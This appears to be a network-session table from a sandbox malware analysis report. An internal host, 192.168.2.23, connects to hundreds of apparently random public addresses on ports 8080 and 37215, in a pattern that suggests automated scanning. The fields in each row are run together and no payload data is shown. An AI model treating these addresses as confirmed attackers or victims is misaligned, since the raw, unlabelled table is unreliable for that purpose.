                                                        13416192.168.2.2353150148.81.142.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13417192.168.2.234631674.119.107.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13418192.168.2.2355578147.163.252.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13419192.168.2.233504437.21.43.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13420192.168.2.23361464.53.250.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13421192.168.2.233954284.235.118.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13422192.168.2.235666012.149.226.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13423192.168.2.2355892130.173.212.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13424192.168.2.2349318205.183.78.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13425192.168.2.2335352149.255.191.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13426192.168.2.2348856188.185.147.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13427192.168.2.23430309.15.82.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13428192.168.2.235108035.236.64.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13429192.168.2.234422641.60.50.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13430192.168.2.235027860.131.235.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13431192.168.2.2348394211.99.125.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13432192.168.2.234441887.74.118.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13433192.168.2.2356834193.76.105.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13434192.168.2.233403613.6.51.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13435192.168.2.2338156180.29.18.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13436192.168.2.2342080131.24.126.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13437192.168.2.2354790106.109.131.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13438192.168.2.234833847.51.18.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13439192.168.2.2342870213.167.155.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13440192.168.2.2336782129.182.1.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13441192.168.2.234598444.39.163.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13442192.168.2.2332964216.84.142.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13443192.168.2.233557654.57.78.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13444192.168.2.23355185.214.244.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13445192.168.2.2340858213.75.135.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13446192.168.2.235131465.0.27.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13447192.168.2.2335942115.247.160.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13448192.168.2.2339602101.238.95.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13449192.168.2.2354256209.152.181.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13450192.168.2.234703089.23.28.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13451192.168.2.23485409.162.99.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13452192.168.2.2334418111.180.200.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13453192.168.2.235464097.29.71.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13454192.168.2.235225694.12.86.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13455192.168.2.2351498177.57.202.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13456192.168.2.2332922213.242.30.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13457192.168.2.23413565.41.218.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13458192.168.2.235856048.4.240.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13459192.168.2.2357412179.56.6.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13460192.168.2.23338121.94.17.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13461192.168.2.2348862126.82.64.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13462192.168.2.235934895.17.49.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13463192.168.2.2339722158.219.49.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13464192.168.2.2352528107.235.127.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13465192.168.2.2345006186.164.111.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13466192.168.2.2340474176.219.163.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13467192.168.2.2333986143.191.226.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13468192.168.2.234189239.25.253.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13469192.168.2.2352000176.96.117.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13470192.168.2.234322873.63.164.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13471192.168.2.234540057.138.255.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13472192.168.2.233879412.172.27.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13473192.168.2.2353420113.145.162.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13474192.168.2.2338020165.169.248.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13475192.168.2.235459093.45.246.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13476192.168.2.2350272167.235.108.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13477192.168.2.2360852103.164.147.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13478192.168.2.2342054119.235.180.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13479192.168.2.23335625.12.106.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13480192.168.2.2340284148.241.130.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13481192.168.2.234948285.193.170.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13482192.168.2.234834698.7.223.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13483192.168.2.2343898164.101.252.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13484192.168.2.2340690196.106.93.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13485192.168.2.2347482197.112.128.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13486192.168.2.2359426119.121.130.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13487192.168.2.2335194216.246.147.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13488192.168.2.2352036130.93.152.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13489192.168.2.235602220.6.207.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13490192.168.2.2337508131.253.10.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13491192.168.2.235606081.198.13.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13492192.168.2.2356374100.214.4.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13493192.168.2.233552636.66.118.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13494192.168.2.2346102182.194.23.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13495192.168.2.2341906119.82.181.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13496192.168.2.2337864160.201.117.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13497192.168.2.2341076157.78.227.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13498192.168.2.233939057.62.202.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13499192.168.2.2357072139.90.217.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13500192.168.2.2356596107.124.96.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13501192.168.2.233305064.169.82.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13502192.168.2.2356798175.239.241.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13503192.168.2.2339936169.122.210.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13504192.168.2.2356420172.58.225.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13505192.168.2.235689070.96.180.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13506192.168.2.2337356148.62.124.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13507192.168.2.2358538110.73.101.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13508192.168.2.234457853.197.18.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13509192.168.2.2346304131.165.244.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13510192.168.2.233731012.164.122.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13511192.168.2.2357928203.72.106.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13512192.168.2.233477274.194.104.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13513192.168.2.236003039.29.51.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13514192.168.2.2353442153.128.154.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13515192.168.2.235436489.159.46.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13516192.168.2.2334126143.72.242.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13517192.168.2.2341492212.109.208.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13518192.168.2.2343192112.45.143.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13519192.168.2.23553905.153.74.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13520192.168.2.2343380113.177.165.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13521192.168.2.234532697.3.87.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13522192.168.2.2355706223.47.17.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13523192.168.2.234711092.221.174.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13524192.168.2.234078467.142.96.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13525192.168.2.2356336164.5.137.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13526192.168.2.2349148146.162.248.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13527192.168.2.233520464.80.50.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13528192.168.2.2343564148.34.165.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13529192.168.2.2359822146.159.29.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13530192.168.2.2350192216.134.122.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13531192.168.2.2351642157.29.138.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13532192.168.2.2347460114.62.85.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13533192.168.2.2351664197.29.60.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13534192.168.2.2337872197.23.129.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13535192.168.2.2334150157.155.206.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13536192.168.2.2352188157.96.225.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13537192.168.2.2342944134.212.184.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13538192.168.2.235526841.250.233.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13539192.168.2.235504041.252.140.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13540192.168.2.234792044.60.211.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13541192.168.2.2352620197.68.51.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13542192.168.2.2357142197.6.127.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13543192.168.2.234807441.14.109.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13544192.168.2.2350662157.170.9.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13545192.168.2.2353144197.127.37.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13546192.168.2.234259850.188.59.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13547192.168.2.234564641.85.221.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13548192.168.2.2337162157.9.124.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13549192.168.2.233600441.191.220.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13550192.168.2.235561450.238.110.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13551192.168.2.2337866197.201.114.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13552192.168.2.2359998197.154.208.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13553192.168.2.2345932197.99.185.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13554192.168.2.2354474197.176.159.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13555192.168.2.2356492157.82.34.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13556192.168.2.2354108197.246.224.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13557192.168.2.2352240197.232.131.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13558192.168.2.2341576197.43.202.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13559192.168.2.234476278.240.58.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13560192.168.2.2353530222.188.131.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13561192.168.2.2351130197.252.61.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13562192.168.2.2354600118.157.117.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13563192.168.2.235618841.80.172.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13564192.168.2.2337620157.73.221.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13565192.168.2.2334838197.4.218.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13566192.168.2.234595495.103.194.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13567192.168.2.2352370197.114.28.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13568192.168.2.233331896.141.156.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13569192.168.2.2346368109.73.41.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13570192.168.2.2354648161.158.16.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13571192.168.2.2342962157.147.26.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13572192.168.2.2352972157.18.0.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13573192.168.2.2347934157.231.17.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13574192.168.2.2358624157.158.104.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13575192.168.2.2338918197.199.208.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13576192.168.2.234657841.75.219.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13577192.168.2.234757841.91.114.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13578192.168.2.2345854157.109.30.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13579192.168.2.2357250197.154.68.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13580192.168.2.235733285.66.191.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13581192.168.2.2351692197.108.105.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13582192.168.2.2349680197.102.100.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13583192.168.2.2340746197.152.188.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13584192.168.2.2347360197.234.151.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13585192.168.2.234079012.31.62.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13586192.168.2.233582641.98.195.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13587192.168.2.2347442157.77.249.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13588192.168.2.2345324197.122.163.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13589192.168.2.236056241.255.38.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13590192.168.2.2360606111.200.47.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13591192.168.2.234945835.90.112.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13592192.168.2.235755223.199.234.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13593192.168.2.233489441.172.88.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13594192.168.2.234109844.209.183.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13595192.168.2.2360868157.75.197.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13596192.168.2.2338022157.77.107.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13597192.168.2.234481041.90.124.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13598192.168.2.234947841.83.23.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13599192.168.2.2336286197.243.106.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13600192.168.2.235352841.232.39.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13601192.168.2.2332780157.145.75.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13602192.168.2.235022241.234.113.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13603192.168.2.234829214.81.194.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13604192.168.2.2346652157.204.65.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13605192.168.2.2359858204.171.43.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13606192.168.2.2347434157.251.180.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13607192.168.2.234660441.169.143.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13608192.168.2.2359242157.181.224.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13609192.168.2.2342122157.181.105.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13610192.168.2.2338062197.34.65.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13611192.168.2.2350312153.98.244.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13612192.168.2.2345650197.121.232.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13613192.168.2.234049841.175.88.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13614192.168.2.2333500167.143.217.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13615192.168.2.2342882197.247.32.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13616192.168.2.235939241.139.72.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13617192.168.2.2355080197.123.212.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13618192.168.2.234824241.135.120.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13619192.168.2.235659441.142.223.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13620192.168.2.2353316157.144.143.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13621192.168.2.235332841.34.30.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13622192.168.2.2344866197.233.89.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13623192.168.2.2355642157.120.227.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13624192.168.2.2354372197.24.162.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13625192.168.2.235235041.133.187.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
